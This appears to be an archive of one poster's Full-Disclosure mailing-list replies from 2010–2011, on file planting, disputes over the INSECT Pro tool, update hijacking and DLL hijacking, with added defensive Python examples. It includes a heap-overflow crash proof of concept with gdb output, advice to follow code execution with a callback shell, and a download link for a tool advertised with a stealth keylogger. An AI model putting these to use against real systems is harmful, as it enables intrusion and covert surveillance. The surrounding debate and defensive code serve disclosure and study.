Actually you *can* launch an executable that way, if you add a couple more clicks afterwards, or you right click on the file and choose a non default menu option. It's no more ridiculous than any other social engineering that requires people to hit a hotkey they probably never heard of and browse all the way to your malicious file... IMHO what you're reporting is a great way to improve social engineering attacks. But you should flag it as such rather than calling it a 0day just for the sake of the fancy word. This is not a demerit of your work in any way, it's just a matter of using the proper vocabulary. On Sat, Jul 9, 2011 at 1:11 AM, Mitja Kolsek mitja.kol...@acrossecurity.com wrote: Ok, Dan, just for you: Launch Internet Explorer 9 on Windows 7 (probably other IE/Win combinations work too), go to File > Open (or press Ctrl+O), browse to Test.html and open it. No double-clicking and you couldn't launch an executable this way. Better? Cheers, Mitja On Jul 8, 2011, at 9:10 PM, Dan Kaminsky d...@doxpara.com wrote: And here's where your exploit stops being one: === Suppose the current version of Apple Safari (5.0.5) is our default web browser. If we put the above files in the same directory (on a local drive or a remote share) and double-click Test.html, what happens is the following: === At this point, Test.html might actually be test.exe with the HTML icon embedded. Everything else then is unnecessary obfuscation -- code execution was already possible from the start by design. This is a neat vector though, and it's likely that with a bit more work it could be turned into an actual RCE. On Fri, Jul 8, 2011 at 10:38 AM, ACROS Security Lists li...@acros.si wrote: We published a blog post on a nice twist to binary planting which we call File Planting. There'll be much more of this from us in the future, but here's the first sample for you to (hopefully) enjoy.
http://blog.acrossecurity.com/2011/07/binary-planting-goes-any-file-type.html or http://bit.ly/nXmRFD Best regards, Mitja Kolsek CEO & CTO ACROS, d.o.o. Makedonska ulica 113 SI - 2000 Maribor, Slovenia tel: +386 2 3000 280 fax: +386 2 3000 282 web: http://www.acrossecurity.com blg: http://blog.acrossecurity.com ACROS Security: Finding Your Digital Vulnerabilities Before Others Do
Re: [Full-disclosure] [New Security Tool] INSECT Pro 2.6.1 release
Probably in fear that said attribution would kill the notion that they actually wrote the software they're trying to sell. IMHO, none of this ranting would happen if the tool had been free to begin with. It's a long lost cause now. On Thu, Jun 23, 2011 at 8:23 PM, root ro...@fibertel.com.ar wrote: Skipfish is Apache 2.0 and Metasploit is BSD. He doesn't even have to release the source. The only thing missing is attribution. On 06/23/2011 03:51 AM, Sergio 'shadown' Alvarez wrote: Juan, I've seen you are using Michal Zalewski's skipfish as engine, isn't it a license violation? Cheers, Sergio On Jun 23, 2011, at 3:16 AM, Juan Sacco wrote: Test your network security and audit your website using the same tools as hackers. INSECT Pro 2.6.1 is available for purchase right now worldwide through PayPal!
* Run Faster: You not only want to make great security testing, you want nice performance
* Load Better: Major graphical interface and optimization features
* Module Search: Ever wondered where that module is? We have a built-in search feature for you
* Improvements and Changes: As always, we've added a lot of other features and optimizations
* The latest exploits found in the wild
We are always trying to be one step ahead of the competition, take a visual tour of some of INSECT Pro's most popular features and discover INSECT Pro today! Start here: http://www.insecurityresearch.com Regards Juan Sacco -- Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com INSECT Pro 2.6.1 on track - Stay tuned
Re: [Full-disclosure] Google chrome sending strange DNS queries
http://isc.sans.org/diary.html?storyid=10312 On Wed, May 18, 2011 at 11:07 PM, Eric dkn...@gmail.com wrote: Greetings, Has anyone ever noticed the sort of DNS queries made when you fire up Google Chrome? DNS queries for domain names like: bsjghxplor hrrtjswxtt epjyptuure etc. The behavior has been observed on Linux as well as Windows systems. See the attached screenshot of the Wireshark dump.
Re: [Full-disclosure] Linux kernel 2011 local root does it exist
Hi, just a quick question, do those exploits you mention work in a jailbroken device? I'm running Linux Leopard lOS 4.3 on my iAndroid tablet. On Wed, May 18, 2011 at 11:41 AM, Joxean Koret joxeanko...@yahoo.es wrote: Sorry men, there is no exploit for Linux Kernel(TM) 2011. But you have exploits for Linux XP. I would like to know is there any local root exploit exist for linux kernel 2011 .
Re: [Full-disclosure] Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient
Is the suid bit set on that binary? Otherwise, unless I'm missing something, it doesn't seem to be exploitable by an attacker... On Thu, Apr 28, 2011 at 12:03 PM, Juan Sacco jsa...@insecurityresearch.com wrote: Information Name: Heap Buffer Overflow in xMatters AlarmPoint APClient Version: APClient 3.2.0 (native) Software: xMatters AlarmPoint Vendor Homepage: http://www.xmatters.com Vulnerability Type: Heap Buffer Overflow Md5: 283d98063323f35deb7afbd1db93d859 APClient.bin Severity: High Researcher: Juan Sacco jsacco [at] insecurityresearch [dot] com Description -- The AlarmPoint Java Server consists of a collection of software components and software APIs designed to provide a flexible and powerful set of tools for integrating various applications to AlarmPoint. Details --- AlarmPoint APClient is affected by a Heap Overflow vulnerability in version APClient 3.2.0 (native). A heap overflow condition is a buffer overflow where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as the POSIX malloc() call. https://www.owasp.org/index.php/Heap_overflow Exploit as follows: Submit a malicious file containing the exploit

root@ea-gateway:/opt/alarmpointsystems/integrationagent/bin$ ./APClient.bin --submit-file maliciousfile.hex

or

(gdb) run `python -c 'print "\x90"*16287'`
Starting program: /opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c 'print "\x90"*16287'`

Program received signal SIGSEGV, Segmentation fault.
0x0804be8a in free ()
(gdb) i r
eax            0xa303924	170932516
ecx            0xbfb8	49080
edx            0xa303924	170932516
ebx            0x8059438	134583352
esp            0xbfff3620	0xbfff3620
ebp            0xbfff3638	0xbfff3638
esi            0x8059440	134583360
edi            0x80653f0	134632432
eip            0x804be8a	0x804be8a <free+126>
eflags         0x210206	[ PF IF RF ID ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
(gdb)

Solution --- No patch is available at this time.
Credits --- Manually discovered by Insecurity Research Labs Juan Sacco - http://www.insecurityresearch.com -- -- _ Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.5 was released, stay tuned
Re: [Full-disclosure] Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient
Precisely. The PoC triggers the bug by passing a very long command line argument, so it's assumed the attacker has already executed code. The only way this is exploitable is if the binary has suid (then the attacker can elevate privileges) or the command can be executed remotely (and the attacker additionally cannot execute any other commands, but can mysteriously control the arguments). Unless either scenario is researched (and nothing in the advisory tells me so) I call bullshit.

On Thu, Apr 28, 2011 at 6:09 PM, valdis.kletni...@vt.edu wrote:

> On Thu, 28 Apr 2011 14:40:22 -0300, Mario Vilas said:
>
>> Is the suid bit set on that binary? Otherwise, unless I'm missing something it doesn't seem to be exploitable by an attacker...
>
> Who cares? You got code executed on the remote box, that's the *hard* part. Use that to inject a callback shell or something, use *that* to get yourself a shell prompt. At that point, download something else that exploits you to root - if you even *need* to, as quite often the Good Stuff is readable by non-root users.
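The question both replies turn on, whether a crash driven by the binary's own command line crosses a privilege boundary, can be checked mechanically. The following is an added example, not code from the advisory or from either poster: it reads a binary's setuid/setgid bits and owner and reports whether executing it would gain an identity the caller does not already hold. The default path in the `__main__` block is an assumption; pass real paths on the command line.

```python
"""Setuid/setgid triage for a crash driven by a command-line argument.

Added example, not code from the advisory or from either reply. A bug
reachable only through argv is a privilege-escalation candidate only if
executing the binary gains an identity the caller does not already hold,
so the setuid/setgid bits and the file owner are the first things to check.
The default path in the __main__ block is an assumption.
"""
import os
import stat
from dataclasses import dataclass


@dataclass
class PrivilegeReport:
    setuid: bool
    setgid: bool
    owner_uid: int
    owner_gid: int
    crosses_boundary: bool  # executing the file gains a uid/gid the caller lacks


def classify(mode: int, owner_uid: int, owner_gid: int,
             caller_uid: int, caller_gids: set) -> PrivilegeReport:
    """Pure function over stat(2) fields, so it can be exercised on
    constructed values without touching the filesystem."""
    setuid = bool(mode & stat.S_ISUID)
    setgid = bool(mode & stat.S_ISGID)
    # A setuid bit that only hands the caller their own uid elevates
    # nothing; the same goes for setgid into a group they already hold.
    gains_uid = setuid and owner_uid != caller_uid
    gains_gid = setgid and owner_gid not in caller_gids
    return PrivilegeReport(setuid, setgid, owner_uid, owner_gid,
                           gains_uid or gains_gid)


def check_binary(path: str) -> PrivilegeReport:
    """Classify a real file from the current user's point of view."""
    st = os.stat(path)
    return classify(st.st_mode, st.st_uid, st.st_gid,
                    os.getuid(), set(os.getgroups()) | {os.getgid()})


def verdict(report: PrivilegeReport) -> str:
    """What an argv-driven memory-corruption bug buys an attacker here."""
    if report.crosses_boundary:
        who = "root" if report.owner_uid == 0 else f"uid {report.owner_uid}"
        return f"privilege boundary: runs as {who}; local privilege escalation candidate"
    return "no privilege boundary: the caller already runs code as themselves"


if __name__ == "__main__":
    import sys
    # Assumed default target; pass real paths on the command line instead.
    for target in sys.argv[1:] or ["/bin/sh"]:
        print(target, "->", verdict(check_binary(target)))
```

The second scenario in the reply, remote execution with attacker-controlled arguments but no other command execution, is not something a file check can settle; that is the part an advisory would have to demonstrate.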
Re: [Full-disclosure] password.incleartext.com
Actually, if they can get the data back (be it because it's stored in plaintext or in obfuscated plaintext) then it's not secure. Obfuscation doesn't make it more secure, or any less plaintext.

On Wed, Apr 6, 2011 at 11:01 AM, Romain Bourdy achil...@gmail.com wrote:

> Hi Full-Disclosure,
>
> Just my two cents but ... the fact they can give your password back doesn't mean it's stored in cleartext, just that it's not hashed but encrypted with some way to get the original data back. This doesn't mean at all it's not secured, even though in most cases it's not.
>
> -Romain
>
> On Wed, Apr 6, 2011 at 1:36 PM, maksim.file...@fuib.com wrote:
>
>> Kinda plaintextoffenders.com?
>>
>> wbr,
>> - Max
>>
>> full-disclosure-boun...@lists.grok.org.uk wrote on 01.04.2011 02:17:24:
>>
>>> Inc leartext st...@incleartext.com
>>> Sent by: full-disclosure-boun...@lists.grok.org.uk
>>> 01.04.2011 13:14
>>> To: full-disclosure@lists.grok.org.uk
>>> cc:
>>> Subject: [Full-disclosure] password.incleartext.com
>>>
>>> Hi FD,
>>>
>>> Just launched a new website to keep a list of websites storing passwords in clear text, so far the database is small but feel free to add some: http://password.incleartext.com/
>>>
>>> Cheers,
>>> Inc Leartext

--
“My daughter was asked by a little old lady in a London hotel restaurant what her daddy did - she answered, ‘He’s a pirate.’ I was very proud of that answer.” - Johnny Depp
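To make the distinction in the exchange above concrete, here is an added example, not code from any of the posters: a reversible "obfuscated" store of the kind that lets a site mail you your own password, next to a salted PBKDF2-HMAC store that can only verify a guess. The XOR key, the iteration count and the sample passwords are constructed placeholders.

```python
"""Reversible "obfuscated" storage versus a salted one-way hash.

Added example, not code from any of the posters. It makes the point of the
exchange concrete: any store from which the site can hand the password back
is, by construction, reversible by whoever holds the data and the key, while
a hashed store can only verify a guess. The XOR key, iteration count and
sample passwords are constructed placeholders.
"""
import base64
import hashlib
import hmac
import secrets
from typing import Optional

# --- "obfuscated plaintext": a static key XOR, then base64 (constructed) ---
OBFUSCATION_KEY = b"site-wide-static-key"


def _xor(data: bytes) -> bytes:
    return bytes(b ^ OBFUSCATION_KEY[i % len(OBFUSCATION_KEY)]
                 for i, b in enumerate(data))


def obfuscate(password: str) -> str:
    return base64.b64encode(_xor(password.encode())).decode()


def deobfuscate(blob: str) -> str:
    """What the 'email me my password' feature does, and what anyone who
    copies the table and the key can do just as easily."""
    return _xor(base64.b64decode(blob)).decode()


# --- one-way storage: PBKDF2-HMAC-SHA256 with a per-record random salt ---
ITERATIONS = 200_000  # assumed work factor; tune to the server's budget


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    salt = salt if salt is not None else secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    _, iterations, salt_hex, digest_hex = stored.split("$")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def recover(stored: str) -> Optional[str]:
    """Simulates a 'forgot password' handler against either record format:
    the obfuscated record yields the password, the hashed one yields nothing
    (a reset is the only option left, which is the desired property)."""
    if stored.startswith("pbkdf2_sha256$"):
        return None
    return deobfuscate(stored)
```

The per-record salt is why two users with the same password get different records; without it, one cracked record cracks every identical one.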
Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool
Actually, when the tool was originally released it wasn't free (strings attached or not), but they tried to charge $500 per license as a closed source product.

http://seclists.org/fulldisclosure/2010/Sep/283

So at any rate some people have been complaining over and over about the use of the word "free" since version 2.0.

http://seclists.org/fulldisclosure/2011/Jan/504

BTW I do not mind people making yet another UI for Metasploit, but this "free but not free" thing creates a dishonest image that could have easily been avoided by following the same practice every other donationware follows: let users download it freely and decide whether to donate or not based on their experience with the software.

On Fri, Apr 1, 2011 at 12:36 PM, Esteban Cañizal este...@canizal.com.ar wrote:

> Yes, I do agree with you! Everybody can comment and disagree as much as they wish. What I am trying to say is that there is a bunch of people that always complain about the same things that have already been answered. If you decided you don't like the tool, just don't use it and find a better one, at least that is what I usually do. I read the same people saying the same things that have been said when the tool was released (1.0).
>
> --
> Esteban Cañizal
Re: [Full-disclosure] Insect Pro 2.1 : New version release
It seems to be a different version. IMHO if I have to pay to download it then it's not really free. Insect should follow the same donation policy as any open source project - download should be free and donation should be optional. This is probably a non-issue anyway but I feel the word "free" shouldn't be used in this context, at least I find it misleading...

On Tue, Mar 8, 2011 at 10:31 AM, Quentin Ducas quentin@gmail.com wrote:

> Real free version (no donation needed) here: http://insectpro.highprofilesite.com/
>
> Quentin
>
> 2011/3/7 Juan Sacco jsa...@insecurityresearch.com:
>
>> The Insect Pro 2.1 new version is now accessible on Insecurity Research servers! Get it now to enjoy the positive changes that this update brings, based directly on user feedback.
>>
>> Insect Pro is a penetration security auditing and testing software solution designed to allow organizations of all sizes to mitigate, monitor and manage the latest security threats and vulnerabilities and implement active security policies by performing penetration tests across their infrastructure and applications.
>>
>> Insect Pro 2.1 includes:
>> - Minimize to systray to work in background
>> - Video recording
>> - Capture screenshots
>> - Keylogging feature
>> - Command-line based control
>> - GUI improved
>>
>> Read full patch notes on our site to learn more about what's new and improved. Also, anyone that has not yet donated to get a license may do it now and obtain a free version of the new stealth keylogger!
>>
>> Juan Sacco
>>
>> --
>> Insecurity Research - Security auditing and testing software
>> Web: http://www.insecurityresearch.com
>> Insect Pro 2.1 was released, stay tuned
Re: [Full-disclosure] [CORE-2010-1001] Cisco WebEx .atp and .wrf Overflow Vulnerabilities
Gotta love the team name ;)

http://www.goear.com/listen/570f6b5/debede-sumo

On Mon, Jan 31, 2011 at 10:17 PM, CORE Security Technologies Advisories advisor...@coresecurity.com wrote:

> 7. *Credits*
>
> These vulnerabilities were discovered and researched by Federico Muttis, Sebastian Tello and Manuel Muradas from Core Security Technologies during Bugweek 2010 as part of the "Cisco Baby Cisco!" team [2]. The publication of this advisory was coordinated by Pedro Varangot.
Re: [Full-disclosure] [VIDEO] Keylogger, RecordMic and Shell
Oh, fuck this shit.

http://rapidshare.com/files/444699301/InsectProFull.zip

This is the previous version, you can guess what the new version should be like.
Re: [Full-disclosure] Evilgrade 2.0 - the update exploitation framework is back
It would indeed be vulnerable to that, and you're also right about this attack vector being quite small. But IMHO an updates mechanism that signs its packages is quite easy to implement, so we're talking about getting a tangible benefit from a small effort.

Preventing the signing key from being stolen is a different matter entirely - it has to do with the vendor's own network infrastructure security. Unsigned updates, on the other hand, rely on the client network's security, which cannot be controlled by the vendor. In other words, a signed updates mechanism is clearly more secure than an unsigned updates mechanism, even if neither of them can be 100% secure, and it comes at very little cost. Also, there's no such thing as a 100% secure system. :)

BTW, I don't think the programmers of each application should be developing their own signature code. Never code your own crypto, just use what's available. Also, I believe the operating system should provide the mechanism, not the application.

On Sun, Oct 31, 2010 at 3:36 PM, valdis.kletni...@vt.edu wrote:

> On Sun, 31 Oct 2010 13:09:27 BST, Mario Vilas said:
>
>> Just signing the update packages prevents this attack, so it's not that hard to fix.
>
> Except if a signing key gets compromised, as happened to one Linux vendor recently, causing a lot of kerfuffle...
>
> Setting up a proper signing system involves a certain amount of actual cost and effort. And every organization that produces code, be it for-profit proprietary code or free open-source code, has to make resource tradeoffs. Is there any actual *evidence* that hijacking authorized updates is a big enough problem to be worth it? If each year, 5 of their customers get pwned by the sort of attack that Evilgrade does, but 50,000 get pwned by "click here" popups that code signing won't do squat to prevent, is it really worth their time and effort? Sure, sucks to be one of the 5, but if they instead spend the resources to do something *else* to make their customer's lives better that would benefit thousands rather than the 5

--
HONEY: I want to… put some powder on my nose.
GEORGE: Martha, won’t you show her where we keep the euphemism?
Re: [Full-disclosure] Evilgrade 2.0 - the update exploitation framework is back
Just signing the update packages prevents this attack, so it's not that hard to fix.

On Sat, Oct 30, 2010 at 5:02 PM, valdis.kletni...@vt.edu wrote:

> On Sat, 30 Oct 2010 04:43:14 +0800, Jacky Jack said:
>
>> It's now a time for vendors to re-consider their updating scheme.
>
> And do what differently, exactly? OK, so it's *possible* to fake out the iTunes update process. But which is easier and more productive:
>
> A) Laying in wait for some random to think "Wow, I should update iTunes" and hijack the process.
>
> B) Send out a few hundred thousand spam with a 'From: upd...@apple-itunes-support.com' with a link to a site you control and feed the sheep some malware.
>
> Evilgrade looks like a nice tool to have if you're doing a pen test or a targeted attack and can somehow get the victim to do an update (possibly social engineering), but for any software vendor feeding software updates to Joe Sixpack this threat model is *so* far down the list it isn't funny. Simply compare the number of boxes pwned by (A) and (B) - how many people have gotten pwned because somebody hijacked their update from Symantec or wherever, compared to the number pwned because they got a popup that said "Your computer is infected, click here to fix it"?
>
> Remember - just because a new tool useful for an attacker shows up, does *not* mean it's a game changer for the industry at large.
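This message and the longer reply earlier on this page (the one beginning "It would indeed be vulnerable to that") both argue that signing update packages is the cheap fix for the Evilgrade class of attack. The following added example, which is neither Evilgrade code nor any vendor's updater, shows the minimal protocol: the vendor signs a manifest carrying the package digest and version, and the client, holding only the pinned public key, verifies the signature, checks the digest of the downloaded bytes, and refuses downgrades. It assumes the third-party `cryptography` package for Ed25519; the package bytes, product name and version numbers are constructed. The anti-rollback check goes slightly beyond what the thread discusses, but a signed-but-old manifest is the obvious next thing an on-path attacker would replay.

```python
"""Signed update manifest: vendor signs, client verifies.

Added example for the two Evilgrade messages on this page; it is neither
Evilgrade code nor any vendor's updater. It assumes the third-party
`cryptography` package for Ed25519. Package bytes, product name and
version numbers are constructed placeholders.
"""
import hashlib
import json

from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import (
    Ed25519PrivateKey,
    Ed25519PublicKey,
)


def canonical(manifest: dict) -> bytes:
    """Canonical JSON so signer and verifier sign/verify identical bytes."""
    return json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()


# ---- vendor side: runs on build infrastructure that holds the private key
def build_manifest(name: str, version: int, package: bytes) -> dict:
    return {"name": name, "version": version,
            "sha256": hashlib.sha256(package).hexdigest()}


def sign_manifest(priv: Ed25519PrivateKey, manifest: dict) -> bytes:
    return priv.sign(canonical(manifest))


# ---- client side: ships only the public key, pinned at install time
class UpdateRejected(Exception):
    pass


def verify_update(pub: Ed25519PublicKey, manifest: dict, signature: bytes,
                  package: bytes, installed_version: int) -> bool:
    """Accept only a package the vendor signed that is newer than what is
    installed. The order matters: nothing in the manifest is trusted
    until its signature has verified."""
    try:
        pub.verify(signature, canonical(manifest))
    except InvalidSignature:
        raise UpdateRejected("manifest signature does not verify")
    if manifest["version"] <= installed_version:
        raise UpdateRejected("downgrade or replay of an old signed manifest")
    if hashlib.sha256(package).hexdigest() != manifest["sha256"]:
        raise UpdateRejected("package bytes do not match the signed digest")
    return True


def accepted(pub, manifest, signature, package, installed_version) -> bool:
    try:
        return verify_update(pub, manifest, signature, package, installed_version)
    except UpdateRejected:
        return False


def demo() -> dict:
    """Walks the scenarios discussed: a genuine update, on-path tampering
    by someone without the vendor key, and replay of an old signed manifest."""
    vendor_key = Ed25519PrivateKey.generate()
    pinned_pub = vendor_key.public_key()
    package = b"constructed package bytes, version 2"  # placeholder
    manifest = build_manifest("example-app", 2, package)
    signature = sign_manifest(vendor_key, manifest)
    attacker_key = Ed25519PrivateKey.generate()  # has no access to vendor_key
    return {
        "genuine": accepted(pinned_pub, manifest, signature, package, 1),
        "swapped_package": accepted(pinned_pub, manifest, signature, b"something else", 1),
        "edited_manifest": accepted(pinned_pub, dict(manifest, version=3), signature, package, 1),
        "forged_by_attacker": accepted(pinned_pub, manifest,
                                       attacker_key.sign(canonical(manifest)), package, 1),
        "replayed_old": accepted(pinned_pub, manifest, signature, package, 2),
    }
```

Note where the secret lives: only the vendor's build system holds `vendor_key`, which is exactly the "vendor's own infrastructure" risk the reply distinguishes from the client network's security. Compromise of that key is not something the client-side check can detect; key rotation and revocation are a separate mechanism.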
Re: [Full-disclosure] Rooted CON 2011: Welcome Hex Rays as new sponsor
<paranoid>Uhm, why the redirection through Facebook?</paranoid>

2010/10/21 Román Ramírez pat...@0z0ne.com

> Hello all,
>
> We don't send emails to communicate sponsorships as we understand it is quite disturbing and we all receive a lot of email. But this is a special situation as I want to transmit a big THANK YOU to the Hex Rays team, and especially to Ilfak Guilfanov, as he has been absolutely kind with us, giving it support as quickly as he was able to.
>
> IDA Pro is a great product, but the team behind it is the greatest.
>
> Thanks a lot, Hex Rays
>
> http://www.facebook.com/l/e0f03FgjJ4fe1x13sURaCdSeCgQ;www.rootedcon.es/eng/blog/2010/10/new-rooted-con-2011-sponsor-hex-rays.html
Re: [Full-disclosure] New tool for pentesting
To be fair, both Canvas and Impact had the same pivoting features years before Metasploit (and yes, that includes the entire Windows API too). It's no wonder really, since Metasploit is newer too (Impact was created some ten odd years ago and Canvas came shortly later, if I'm not wrong). But IMHO if a community, open source project like Metasploit can reach the quality of its big budget, closed source competitors, that alone is quite impressive!

What I think is really wrong here is someone made a poorly designed (at least judging from the GUI), Windows-only commercial tool by ripping off a few public exploits... What's the added value here? What are these people trying to charge money for, exactly? This looks like snake oil to me.

On Fri, Sep 17, 2010 at 6:54 PM, rdse...@mtu.edu wrote:

> Seriously. The only reason CANVAS and IMPACT are still used is because of the 0-days that come packaged with them. Metasploit is far superior not only in exploitation, but post exploitation, persistence, network pivoting, and just generally being a badass! Can ANYTHING really compare to the meterpreter for pwning windows? They implemented remote kernel calls for God's sake! You have the ENTIRE windows API at your disposal with it, assuming you don't want to use one of the very awesome ruby scripts that come with it to manipulate your tokens or do remote route additions!
>
> If I'm going to use any 'enterprise level vulnerability scanner' ::shudders:: it'll be Metasploit express, or MAYBE Nessus. Mainly just my brain though, which costs me nothing!
>
> If you're going to try to sell stuff like this, I wouldn't go where ACTUAL security people dwell, I'd go back to the netstumbler forums. You'd have better luck there.
>
> On Sep 17, 2010, at 11:31 AM, Eyeballing Weev eyeballing.w...@gmail.com wrote:
>
>> Looking at that webpage is making me rage. I'm sending him an invoice for a new keyboard.
Re: [Full-disclosure] NMAP Vulnerable to attack
How ironic...

On Fri, Sep 10, 2010 at 11:07 PM, valdis.kletni...@vt.edu wrote:

> On Fri, 10 Sep 2010 22:52:46 +0200, Stefano Angaran said:
>
>> I think that was a joke
>
> You're new here, aren't you? :)
Re: [Full-disclosure] DLL hijacking with ZIP files in email?
If you email a web page, typically all files are unzipped when the user double clicks on any .html file, but I still don't see this as something drastically different from double clicking on exe files...

On Thu, Sep 2, 2010 at 12:45 AM, coderman coder...@gmail.com wrote:

> On Wed, Sep 1, 2010 at 2:05 PM, paul.sz...@sydney.edu.au wrote:
>
>> The essence of DLL hijacking is to deliver an innocent file together with a malicious DLL, in the one directory. Would it be possible to do this via email: a ZIP (or similar) archive containing the two files?
>
> i don't know of a way to do this with ZIP archives.
>
> the daemontools / easycd / related tools which automount ISO and other archive images as drive letters on the host are vulnerable. autorun on/off may add insult to injury with such services...
Re: [Full-disclosure] DLL hijacking with Autorun on a USB drive
On Fri, Aug 27, 2010 at 5:27 PM, matt m...@attackvector.org wrote:

> 2) This opens the door for more widespread attacks. In the case of PowerPoint, one could simply find a share on a network that contains a large amount of ppt files and save his/her rogue DLL file in that directory. Then, whenever anyone opens one of the files, the attacker gets immediate access to the victim's PC without the victim having any idea.

This is not any different from what worms used to do back in 2000...

http://dpnm.postech.ac.kr/research/04/nsri/papers/010919-Analysis-Nimda.pdf (See page 4)
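The two DLL-hijacking threads above (the ZIP-attachment question and the shared-folder-full-of-.ppt scenario) describe the same artefact from a defender's side: a loadable module sitting next to documents in a place where no module belongs. The following added example, not code from any of the posters, applies one name-based check to both a directory tree and the listing of a ZIP attachment, and builds its own constructed sample data. The extension lists are assumptions, and a hit is a triage lead rather than proof that the module is malicious.

```python
"""Flag loadable modules sitting beside documents, in a folder or in a ZIP.

Added example for the ZIP-attachment and network-share DLL hijacking
messages; not code from any poster. Extension lists and the sample data
built in demo() are constructed assumptions. The check is purely by file
name and says nothing about whether a flagged module is malicious.
"""
import os
import tempfile
import zipfile
from collections import defaultdict

DOCUMENT_EXTS = {".ppt", ".pptx", ".doc", ".docx", ".xls", ".xlsx",
                 ".pdf", ".html", ".htm"}
LOADABLE_EXTS = {".dll", ".ocx", ".cpl"}


def suspicious_pairs(names):
    """Given relative paths, return {directory: (documents, loadables)} for
    every directory that holds at least one document and one loadable."""
    by_dir = defaultdict(lambda: ([], []))
    for name in names:
        directory, base = os.path.split(name.replace("\\", "/"))
        ext = os.path.splitext(base)[1].lower()
        if ext in DOCUMENT_EXTS:
            by_dir[directory][0].append(base)
        elif ext in LOADABLE_EXTS:
            by_dir[directory][1].append(base)
    return {d: v for d, v in by_dir.items() if v[0] and v[1]}


def scan_directory(root):
    """Walk a share or folder tree; paths are reported relative to root."""
    names = []
    for dirpath, _, files in os.walk(root):
        rel = os.path.relpath(dirpath, root)
        for f in files:
            names.append(f if rel == "." else os.path.join(rel, f))
    return suspicious_pairs(names)


def scan_zip(path):
    """Same check on an archive's listing, without extracting anything."""
    with zipfile.ZipFile(path) as zf:
        return suspicious_pairs(n for n in zf.namelist() if not n.endswith("/"))


def make_sample_zip(path):
    """Constructed attachment: a saved web page with a DLL dropped beside it."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("report/index.html", "<html></html>")
        zf.writestr("report/images/logo.png", b"")
        zf.writestr("report/some.dll", b"MZ")
        zf.writestr("clean/notes.pdf", b"%PDF")
    return path


def demo():
    """Runs both scans over constructed data in a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        zip_hits = scan_zip(make_sample_zip(os.path.join(tmp, "attachment.zip")))
        share = os.path.join(tmp, "share")
        os.makedirs(os.path.join(share, "decks"))
        os.makedirs(os.path.join(share, "clean"))
        for rel in ("decks/q1.pptx", "decks/q2.pptx",
                    "decks/dropped.dll", "clean/memo.docx"):
            open(os.path.join(share, rel), "wb").close()
        dir_hits = scan_directory(share)
    return zip_hits, dir_hits


if __name__ == "__main__":
    for label, hits in zip(("zip", "share"), demo()):
        for directory, (docs, mods) in hits.items():
            print(f"[{label}] {directory}: {len(docs)} document(s) beside {mods}")
```

On a real share the useful follow-up is who can write to the flagged directory, since the scenario in the thread needs a location that is both writable by the attacker and browsed by victims.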
Re: [Full-disclosure] WinAppDbg 1.4 is out!
Basically it supports 64 bit Windows, has a few more features, and comes with a crash analyzer. PyDbg on the other hand supports Mac OS and is integrated with PaiMei. So both frameworks have their own advantages.

Also the programming API for PyDbg is much simpler (but still powerful), but WinAppDbg's is more complete, documented, and object oriented. So if I were you, I wouldn't rush to port all my already written code to WinAppDbg :) but if you're about to code something new you might want to give it a try!

On Tue, Aug 24, 2010 at 9:42 PM, Aleksandr Yampolskiy ayampols...@gilt.com wrote:

> How is it different from pydbg?
>
> Sent from my Blackberry handheld.
>
> - Original Message -
> From: Mario Vilas mvi...@gmail.com
> To: bugt...@securityfocus.com; full-disclosure@lists.grok.org.uk; Python-Win32 List python-wi...@python.org
> Sent: Tue Aug 24 09:00:59 2010
> Subject: WinAppDbg 1.4 is out!
>
> [...]
[Full-disclosure] WinAppDbg 1.4 is out!
What is WinAppDbg?
==================

The WinAppDbg python module allows developers to quickly code instrumentation scripts in Python under a Windows environment. It uses ctypes to wrap many Win32 API calls related to debugging, and provides an object-oriented abstraction layer to manipulate threads, libraries and processes, attach your script as a debugger, trace execution, hook API calls, handle events in your debugee and set breakpoints of different kinds (code, hardware and memory). Additionally it has no native code at all, making it easier to maintain or modify than other debuggers on Windows.

The intended audience are QA engineers and software security auditors wishing to test / fuzz Windows applications with quickly coded Python scripts. Several ready to use utilities are shipped and can be used for these purposes.

Current features also include disassembling x86 native code (using the open source diStorm project, see http://ragestorm.net/distorm/), debugging multiple processes simultaneously and producing a detailed log of application crashes, useful for fuzzing and automated testing.

What's new in this version?
===========================

In a nutshell...

* fully supports Python 2.4 through 2.7
* fully supports Windows XP through Windows 7, 32 and 64 bit editions
* crash report tool now supports MSSQL (requires pyodbc)
* now supports downloading debugging symbols from Microsoft (thanks Neitsa!)
* new tool: sehtest.py (Windows SEH buffer overflow jump address bruteforcer, inspired by the same tool by Nicolas Economou)
* the tutorial is now available in chm and pdf formats
* now with only one MSI installer for all supported Python versions
* added support for diStorm 3 (falls back to the old version if not found)
* now using cerealizer instead of pickle whenever possible
* added new command to the command line debugger to show the SEH chain
* a few more anti-anti-debug tricks were added, still more to go!
* several improvements to the Window instrumentation classes
* more code examples
* more Win32 API wrappers
* lots of miscellaneous improvements, more documentation and bugfixes as usual!

Entire changelog for all versions (slow!):
http://p.sf.net/winappdbg/changelog

Where can I find WinAppDbg?
===========================

Project homepage:
-----------------
http://tinyurl.com/winappdbg

Download links:
---------------

Windows installer (32 bits)
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.win32.exe/download
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.win32.msi/download

